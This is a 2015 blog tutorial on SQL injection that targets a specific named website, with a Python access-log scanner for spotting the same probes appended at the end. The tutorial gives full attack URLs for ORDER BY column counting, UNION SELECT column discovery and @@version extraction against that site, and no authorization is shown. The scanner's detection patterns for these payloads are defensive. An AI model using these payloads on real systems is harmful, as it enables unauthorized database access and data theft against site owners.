Sunday 16 August 2015

SQL Injection - Tutorial - Method 1

So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our code to get the database information :D

So my target today will be:

http://www.novebrno.net/article.php?id=616

I tested it and it is vulnerable.
Now we are going to add +ORDER+BY+1-- to the site's URL. Most people who know SQL will ask why not add order by 1-- ? Mainly because you can change the URL if you add the + to order by 1--, you will find it out yourself :p

So the site should look like this now :

http://www.novebrno.net/article.php?id=-616+ORDER+BY+1--

Now you will say: I didn't get an error. Well, now simply change the 1 at the end of the URL to 2, and keep going until you get an error. I tested it and I got an error at column 12:

So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

So now let's keep going.
Now that we know the 11 available columns, we gotta find the vulnerable column.

Just add :

+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--

At the end of the URL.

NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- because I have 11 available columns; yours might be different.

Now there should be a number on the screen; it can only be one of the 11 available columns (in my case).
But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

So all we do now is add a - before the id number (616 becomes -616).

It should look like this :

http://www.novebrno.net/article.php?id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--

Now I am getting an error and the number is showing :

Number 5 is showing on my screen, so now we will keep going with this number.
So now we have to replace the number 5 with @@version

Add this at the end of the url:

+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

NOTE: In my case number 5 is showing; if you have number 3 on the screen it should look like this :

+UNION+SELECT+1,2,@@version--

The URL should look like this :

http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

So now you will see a number on the screen; it is the database version. If the database is version 5 or above, you are fine and it will be easy to get the information and tables :)

If the database is version 4 or lower, it will be hard to get tables; more on that later. :D
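Every step in this walkthrough (the incrementing ORDER BY requests, the UNION SELECT with a numbered column list, the @@version lookup) lands in the web server's access log, so the sequence can be flagged from the defender's side. The scanner below is an added example, not part of the original post; it assumes common/combined log format, the log lines are constructed, and the threshold of three distinct ORDER BY indexes is an assumed tuning value.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Aug/2015:10:00:01 +0000] "GET /article.php?id=616+ORDER+BY+1-- HTTP/1.1" 200 5120
192.0.2.10 - - [16/Aug/2015:10:00:03 +0000] "GET /article.php?id=616+order+by+2-- HTTP/1.1" 200 5120
192.0.2.10 - - [16/Aug/2015:10:00:09 +0000] "GET /article.php?id=616+ORDER+BY+12-- HTTP/1.1" 200 310
192.0.2.10 - - [16/Aug/2015:10:00:15 +0000] "GET /article.php?id=-616+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11-- HTTP/1.1" 200 5200
192.0.2.10 - - [16/Aug/2015:10:00:21 +0000] "GET /article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11-- HTTP/1.1" 200 5210
198.51.100.7 - - [16/Aug/2015:10:01:00 +0000] "GET /article.php?id=617 HTTP/1.1" 200 4800
198.51.100.7 - - [16/Aug/2015:10:01:05 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900
"""

# Assumption: common/combined log format; only client IP and request target are used.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} ')
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)      # numeric index only
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
SERVER_VAR = re.compile(r"@@\w+")                          # e.g. @@version
MIN_PROBES = 3  # assumed threshold: distinct ORDER BY indexes from one client

def scan(log_text):
    """Return {client_ip: sorted finding labels} for injection-shaped requests."""
    probes = defaultdict(set)    # ip -> ORDER BY indexes seen in parameters
    findings = defaultdict(set)  # ip -> labels
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl decodes '+' and %xx, so 'ORDER+BY+1--' becomes 'ORDER BY 1--'
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for n in ORDER_BY.findall(value):
                probes[ip].add(int(n))
            if UNION_SELECT.search(value):
                findings[ip].add("union-select")
            if SERVER_VAR.search(value):
                findings[ip].add("server-variable")
    for ip, seen in probes.items():
        if len(seen) >= MIN_PROBES:  # several different indexes = column counting
            findings[ip].add("order-by-column-count")
    return {ip: sorted(labels) for ip, labels in findings.items()}

if __name__ == "__main__":
    for ip, labels in scan(SAMPLE_LOG).items():
        print(ip, labels)
```

The ordinary search for "order by phone" is not flagged because the ORDER BY pattern only matches a numeric column index inside a parameter value.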
